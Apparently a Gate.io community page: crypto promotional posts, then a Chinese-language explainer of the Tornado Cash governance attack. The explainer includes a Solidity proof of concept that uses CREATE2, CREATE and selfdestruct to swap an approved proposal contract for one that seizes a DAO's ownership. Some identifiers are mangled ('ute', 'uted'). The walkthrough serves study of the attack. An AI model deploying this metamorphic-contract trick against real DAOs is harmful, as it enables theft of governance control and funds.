- 置顶
- 🎈12周年庆典——限时狂欢派对第二期开启
赢iPhone16 Pro、Macbook Air等惊喜豪礼
✅ 登录即送免费游戏机会:https://www.gate.io/activities/12th-anniversary?pid=APP&ch=s9ZCIeg6
还可参与抽周边,100%领取专属周年限定好礼
活动详情:https://www.gate.io/announcements/article/44624
#Gateio12Years#
- 🎊 五一快乐!与动态欢度五一,参与成长值抽奖赢好礼!
立即抽奖 👉 https://www.gate.io/activities/creditprize?now_period=10&pid=APP&ch=stu2ZKGn
在动态【社区中心】完成成长值任务获取成长值参与抽奖
Macbook Air、精美周边、点卡、合约体验券、热币等超级大奖等你来抽!
📌 每日均可抽奖,100%中奖!奖品有限,先到先得,抽完即止,赶快参与吧!
详情:https://www.gate.io/announcements/article/44619
#社区成长值#
- 🔥 距离 Gate.io WCTC S7 正式开赛仅剩 7 天
世界加密货币交易大赛即将开启,总奖池高达 $5,000,000
👉🏻 立即报名:https://gate.io/competition/wctc/s7?pid=APP&c=moments_gatePost&ch=druYjDaF
报名参赛,不仅有机会赢取高达百万美元的个人奖励,更有 Gate.io 专属周边大礼等你来拿
全球顶尖交易员正在集结,一场交易盛宴即将开启
🔗 活动详情: https://www.gate.io/announcements/article/44440
- 📢 重磅消息:MemeBox 现已支持SOL链资产!
🎁 为庆祝SOL链上线,限时价值300 $SOL 奖励活动现已开启
专属奖励活动限时开放,先到先得
👉 即刻行动,领取奖励!
更多详情:https://www.gate.io/announcements/article/44745
#Gateio # #GateioMemeBox # #SOL#
- 🌟 参与Gate.io动态内容挖矿,享受最高达10%的手续费返佣!💰
📌 如何参与:
1.发布动态:分享行情解析、交易观点等优质内容。
2.获取互动:吸引用户点赞和评论您的帖子。
3.参与交易:在互动后180分钟内进行现货或合约交易。
4.收获收益:成功交易后,您将获得最高达10%的手续费返佣!
即刻发布:https://www.gate.io/post
详情:https://www.gate.io/announcements/article/29944
Tornado治理攻击:如何同一个地址上部署不同的合约
大概两周前(5 月 20 日),知名混币协议 Tornado Cash 遭受到治理攻击,黑客获取到了Tornado Cash的治理合约的控制权(Owner)。
攻击过程是这样的:攻击者先提交了一个“看起来正常”的提案, 待提案通过之后, 销毁了提案要执行的合约地址, 并在该地址上重新创建了一个攻击合约。
攻击过程可以查看 SharkTeam 的 Tornado.Cash提案攻击原理分析[1]。
这里攻击的关键是在同一个地址上部署了不同的合约, 这是如何实现的呢?
背景知识
EVM 中有两个操作码用来创建合约:CREATE 与 CREATE2 。
CREATE 操作码
当使用 new Token() 使用的是 CREATE 操作码 , 创建的合约地址计算函数为:
address tokenAddr = bytes20(keccak256(senderAddress, nonce))
创建的合约地址是通过创建者地址 + 创建者Nonce(创建合约的数量)来确定的, 由于 Nonce 总是逐步递增的, 当 Nonce 增加时,创建的合约地址总是是不同的。
CREATE2 操作码
当添加一个salt时 new Token{salt: bytes32()}() ,则使用的是 CREATE2 操作码 , 创建的合约地址计算函数为:
address tokenAddr = bytes20(keccak256(0xFF, senderAddress, salt, bytecode))
创建的合约地址是 创建者地址 + 自定义的盐 + 要部署的智能合约的字节码, 因此 只有相同字节码 和 使用相同的盐值,才可以部署到同一个合约地址上。
那么如何才能在同一地址如何部署不用的合约?
攻击手段
攻击者结合使用 Create2 和 Create 来创建合约, 如图:
先用 Create2 部署一个合约 Deployer , 在 Deployer 使用 Create 创建目标合约 Proposal(用于提案使用)。Deployer 和 Proposal 合约中均有自毁实现(selfdestruct)。
在提案通过后,攻击者把 Deployer 和 Proposal 合约销毁,然后重新用相同的slat创建 Deployer , Deployer 字节码不变,slat 也相同,因此会得到一个和之前相同的 Deployer 合约地址, 但此时 Deployer 合约的状态被清空了, nonce 从 0 开始,因此可以使用该 nonce 创建另一个合约Attack。
攻击代码示例
此代码来自:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;
contract DAO {
struct Proposal {
address target;
bool approved;
bool uted;
}
address public owner = msg.sender;
Proposal[] public proposals;
function approve(address target) external {
require(msg.sender == owner, "not authorized");
proposals.push(Proposal({target: target, approved: true, uted: false}));
}
function ute(uint256 proposalId) external payable {
Proposal storage proposal = proposals[proposalId];
require(proposal.approved, "not approved");
require(!proposal.uted, "uted");
proposal.uted = true;
(bool ok, ) = proposal.target.delegatecall(
abi.encodeWithSignature("uteProposal()")
);
require(ok, "delegatecall failed");
}
}
contract Proposal {
event Log(string message);
function uteProposal() external {
emit Log("Excuted code approved by DAO");
}
function emergencyStop() external {
selfdestruct(payable(address(0)));
}
}
contract Attack {
event Log(string message);
address public owner;
function uteProposal() external {
emit Log("Excuted code not approved by DAO :)");
// For example - set DAO's owner to attacker
owner = msg.sender;
}
}
contract DeployerDeployer {
event Log(address addr);
function deploy() external {
bytes32 salt = keccak256(abi.encode(uint(123)));
address addr = address(new Deployer{salt: salt}());
emit Log(addr);
}
}
contract Deployer {
event Log(address addr);
function deployProposal() external {
address addr = address(new Proposal());
emit Log(addr);
}
function deployAttack() external {
address addr = address(new Attack());
emit Log(addr);
}
function kill() external {
selfdestruct(payable(address(0)));
}
}
大家可以使用该代码自己在 Remix 中演练一下。